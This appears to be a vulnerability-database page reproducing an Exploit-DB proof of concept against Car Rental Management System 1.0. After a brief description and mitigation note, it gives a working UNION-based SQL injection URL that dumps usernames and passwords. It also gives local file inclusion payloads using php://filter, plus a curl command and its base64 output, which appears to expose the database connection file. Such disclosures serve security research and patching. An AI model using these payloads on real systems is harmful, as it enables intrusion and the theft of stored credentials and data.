Car Rental Management System 1.0 - SQL Injection / Local File include

vendor:

Car Rental Management System

by:

Mosaaed

7.5

CVSS

HIGH

SQL Injection/Local File Inclusion

89,98

CWE

Product Name: Car Rental Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot + Apache/2.4.46 (Debian)

2020

Car Rental Management System 1.0 – SQL Injection / Local File include

Car Rental Management System 1.0 is vulnerable to SQL Injection and Local File Inclusion. An attacker can exploit this vulnerability to gain access to the database information and execute malicious code on the server. The vulnerable page for SQL Injection is http://localhost/carRental/index.php?page=view_car&id=4 and for Local File Inclusion is http://localhost/carRental/index.php?page=about and http://localhost/carRental/admin/index.php?page=movement. The proof of concept for Local File Inclusion is http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home and http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect.

Mitigation:

To mitigate the risk of SQL Injection and Local File Inclusion, the application should use parameterized queries and input validation. The application should also be configured to use a web application firewall.

Source

Exploit-DB raw data:

# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
# Date: 22-10-2020
# Exploit Author: Mosaaed 
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: parrot + Apache/2.4.46 (Debian)

SQL Injection
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4

#POC 1: 
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--

LFI
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement

#POC 1:

http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home

#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect

note POC 2 reading database information

#example : 
curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1

#result

<main id="view-panel" >
        	PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K

#proof of concept picture

https://ibb.co/8Dd7d9G